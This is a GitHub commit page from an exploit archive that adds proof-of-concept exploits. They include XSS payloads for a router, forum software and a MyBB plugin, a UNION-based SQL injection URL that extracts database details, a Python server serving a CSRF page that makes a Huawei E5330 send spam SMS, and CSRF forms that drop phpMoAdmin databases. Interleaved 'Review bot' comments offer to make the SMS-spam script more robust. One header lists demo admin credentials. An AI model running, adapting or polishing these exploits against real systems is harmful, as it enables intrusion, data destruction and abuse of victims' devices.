19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
Offensive Security
committed
Jan 8, 2019
1 parent
e8dcb9f
commit deaee53
Showing
20 changed files
with
1,163 additions
and
0 deletions.
@@ -0,0 +1,20 @@ | ||
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS | ||
# Date: 21/12/2018 | ||
# Exploit Author: Kumar Saurav | ||
# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/ | ||
# Vendor: ChinaMobile | ||
# Category: Hardware | ||
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) | ||
# Tested on: Multiple | ||
# CVE : CVE-2018-20326 | ||
|
||
#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user. | ||
|
||
Reproduction Steps: | ||
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case) | ||
Step 2: Login as Username and Password | ||
Step 3: After Login below url will be shown | ||
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-) | ||
Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter | ||
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>) | ||
Step 5: On execution of the payload, it will be popped up as "XSS-Saurav" |
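Review bot: The gateway URL quoted in steps 3 and 4 reads `/cgi-bin/webprocgetpage=html/index.html&...`, which looks as though it lost the `?` that separates the CGI name from its query string; as written, the reference is ambiguous for anyone trying to confirm the finding, so the author should verify the exact path against the device. The advisory also lists a CVE but no fixed firmware or vendor mitigation; a one-line `# Fix:` entry, or an explicit statement that none is known at the time of writing, would complete the record. "mentinoed" in step 4 should read "mentioned".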
@@ -0,0 +1,49 @@ | ||
# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) | ||
# Date: 01/07/2019 | ||
# Exploit Author: Nathu Nandwani | ||
# Website: http://nandtech.co/ | ||
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ | ||
# Version: 21.210.09.00.158 | ||
# Tested on: Windows 10 x64 | ||
# CVE: CVE-2014-5395 | ||
# Note: The administrator who opens the URL should be authenticated. | ||
import socket | ||
import time | ||
|
||
server_ip = "0.0.0.0" | ||
server_port = 80 | ||
|
||
huawei_ip = "192.168.8.1" | ||
receiving_phone_no = "01234567890" | ||
sms_text = "This is a SPAM text from Huawei E5330" | ||
|
||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
sock.bind((server_ip, server_port)) | ||
sock.listen(1) | ||
|
||
print "Currently listening at " + server_ip + ":" + str(server_port) | ||
|
||
client, (client_host, client_port) = sock.accept() | ||
|
||
print "Client connected: " + client_host + ":" + str(client_port) | ||
print "" | ||
print client.recv(1000) | ||
|
||
client.send('HTTP/1.0 200 OK\r\n') | ||
client.send('Content-Type: text/html\r\n') | ||
client.send('\r\n') | ||
|
||
client.send(""" | ||
<html> | ||
<body> | ||
<script> | ||
var xhr = new XMLHttpRequest(); | ||
xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true); | ||
xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>'); | ||
</script> | ||
</body> | ||
</html> | ||
""") | ||
|
||
client.close() | ||
sock.close() |
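Review bot: Nothing closes `sock` or `client` if `accept()`, `recv()` or `send()` raises, so an aborted run leaves port 80 bound until the interpreter exits, and because the script is Python 2 (`print` statements) socket objects are not context managers there, so a `try`/`finally` is the portable form. The listener is also bound to `0.0.0.0`, which exposes the served page on every interface of the test machine; for a local PoC `server_ip` should default to the lab interface or loopback, and `SO_REUSEADDR` avoids "Address already in use" on quick re-runs. The `<Length>` element is derived from `len(sms_text)`, which is a character count on unicode input but a byte count on `str`; a comment stating that `sms_text` is assumed to be plain ASCII would make that assumption explicit.

```python
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick re-runs
sock.bind((server_ip, server_port))
sock.listen(1)
client = None
try:
    print "Currently listening at " + server_ip + ":" + str(server_port)
    client, (client_host, client_port) = sock.accept()
    # ... unchanged: request echo, response headers and page body ...
finally:
    if client is not None:
        client.close()
    sock.close()
```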
@@ -0,0 +1,36 @@ | ||
# Exploit Title: Embed Video Scripts - Cross-site Script (stored) | ||
# Google Dork: N/A | ||
# Date: 1 Jan 2019 | ||
# Exploit Author: Deyaa Muhammad | ||
# Author EMail: contact [at] deyaa.me | ||
# Author Blog: http://deyaa.me | ||
# POC Video: https://youtu.be/2CFJLwkxpT8 | ||
# Vendor Homepage: https://codeawesome.in/embed/ | ||
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073 | ||
# Demo Website: https://codeawesome.in/embed/ | ||
# Version: N/A | ||
# Tested on: WIN7_x68/Linux | ||
# CVE : N/A | ||
|
||
# Description: | ||
A stored xss found in "Embed Video Scripts" comments section. | ||
|
||
# POC Request: | ||
|
||
:method: POST | ||
:authority: server | ||
:scheme: https | ||
:path: /embed/comments | ||
content-length: 145 | ||
accept: */* | ||
origin: https://server | ||
x-requested-with: XMLHttpRequest | ||
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | ||
content-type: application/x-www-form-urlencoded; charset=UTF-8 | ||
accept-encoding: gzip, deflate, br | ||
accept-language: en-US,en;q=0.9 | ||
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540 | ||
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6 | ||
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6 | ||
|
||
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png |
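Review bot: The three `cookie:` lines in the POC request reproduce what appear to be live visitor/session cookie values from the author's own browser (`__cfduid`, `_tccl_visitor`, `_tccl_visit`); they play no part in the finding and should be replaced with a placeholder such as `cookie: <REDACTED>` so a published advisory does not carry real session material. The host is already anonymised as `server`, so redacting the cookies would be consistent with that. A `# Fix:` or vendor-notification line is also missing; stating whether the vendor was contacted would complete the record.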
@@ -0,0 +1,20 @@ | ||
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection | ||
# Google Dork: "developed by Niche Office" | ||
# Date: 1 Jan 2019 | ||
# Exploit Author: Deyaa Muhammad | ||
# Author EMail: contact [at] deyaa.me | ||
# Author Blog: http://deyaa.me | ||
# Vendor Homepage: https://nicheoffice.web.tr/ | ||
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418 | ||
# Demo Website: https://aiovideodl.ml/ | ||
# Demo Admin Panel: https://aiovideodl.ml/admin/ | ||
# Demo Admin Credentials: demo@aiovideodl.ml/123456 | ||
# Version: 1.2 | ||
# Tested on: WIN7_x68/cloudflare | ||
# CVE : N/A | ||
|
||
# POC: | ||
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- - | ||
|
||
# Exploit: | ||
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- - |
@@ -0,0 +1,24 @@ | ||
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting | ||
# Date: 10/4/2018 | ||
# Author: 0xB9 | ||
# Twitter: @0xB9Sec | ||
# Contact: 0xB9[at]pm.me | ||
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26 | ||
# Version: 1.1.1 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE: CVE-2018-17997 | ||
|
||
|
||
1. Description: | ||
LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs). | ||
|
||
|
||
2. Proof of Concept: | ||
|
||
- Start a new conversation sending to any user (victim) you want | ||
- Use a payload in the title <script>alert('XSS')</script> | ||
- Next time the user (victim) visits the site payload will execute | ||
|
||
|
||
3. Solution: | ||
Update to 1.1.2 |
@@ -0,0 +1,26 @@ | ||
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting | ||
# Date: 12/31/2018 | ||
# Author: 0xB9 | ||
# Twitter: @0xB9Sec | ||
# Contact: 0xB9[at]pm.me | ||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396 | ||
# Version: 1.8.3 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE: CVE-2019-3501 | ||
|
||
|
||
1. Description: | ||
OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles. | ||
|
||
|
||
2. Proof of Concept: | ||
|
||
- Have a mod account level or higher | ||
- Go to Manage Awards in ModCP | ||
- Give an award to a user and input payload for reason <script>alert('XSS')</script> | ||
|
||
- Payload executes when viewing award on awards.php and user profiles. | ||
|
||
|
||
3. Solution: | ||
Update to 1.8.19 |
@@ -0,0 +1,157 @@ | ||
################################################################################################################################## | ||
# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities | ||
# Date: 03.01.2019 | ||
# Exploit Author: Ozer Goker | ||
# Vendor Homepage: http://www.phpmoadmin.com | ||
# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip | ||
# Version: 1.1.5 | ||
################################################################################################################################## | ||
|
||
Introduction | ||
|
||
phpMoAdmin - MongoDB GUI | ||
MongoDB administration tool for PHP | ||
|
||
Vulnerabilities: CSRF | XSS Reflected & Stored | ||
|
||
CSRF details: | ||
|
||
################################################################################# | ||
|
||
CSRF1 | ||
|
||
Create Database | ||
|
||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="db" value="new.database"/> | ||
<input type="text" name="newdb" value="testdb"/> | ||
<input type="submit" value="Create DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
|
||
################################################################################# | ||
|
||
CSRF2 | ||
|
||
Drop Database | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="dropDb"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="submit" value="Drop DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF3 | ||
|
||
Repair Database | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="repairDb"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="submit" value="Repair DB"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF4 | ||
|
||
Add New Collection | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="createCollection"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="text" name="collection" value="testcollection"/> | ||
<input type="submit" value="Create Collection"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
################################################################################# | ||
|
||
CSRF5 | ||
|
||
Drop Collection | ||
|
||
<html> | ||
<body> | ||
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET"> | ||
<input type="text" name="action" value="dropCollection"/> | ||
<input type="text" name="db" value="testdb"/> | ||
<input type="text" name="collection" value="testcollection"/> | ||
<input type="submit" value="Drop Collection"/> | ||
</form> | ||
</body> | ||
</html> | ||
|
||
|
||
################################################################################# | ||
|
||
|
||
XSS details: | ||
|
||
################################################################################# | ||
|
||
XSS1 | Reflected | ||
|
||
URL | ||
http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
db | ||
|
||
PAYLOAD | ||
<script>alert(1)</script> | ||
|
||
################################################################################# | ||
|
||
XSS2 | Reflected | ||
|
||
URL | ||
http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
newdb | ||
|
||
PAYLOAD | ||
<script>alert(2)</script> | ||
|
||
################################################################################# | ||
|
||
XSS3 | Stored | ||
URL | ||
http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb | ||
|
||
METHOD | ||
Get | ||
|
||
PARAMETER | ||
collection | ||
|
||
PAYLOAD | ||
<script>alert(3)</script> | ||
|
||
|
||
################################################################################# |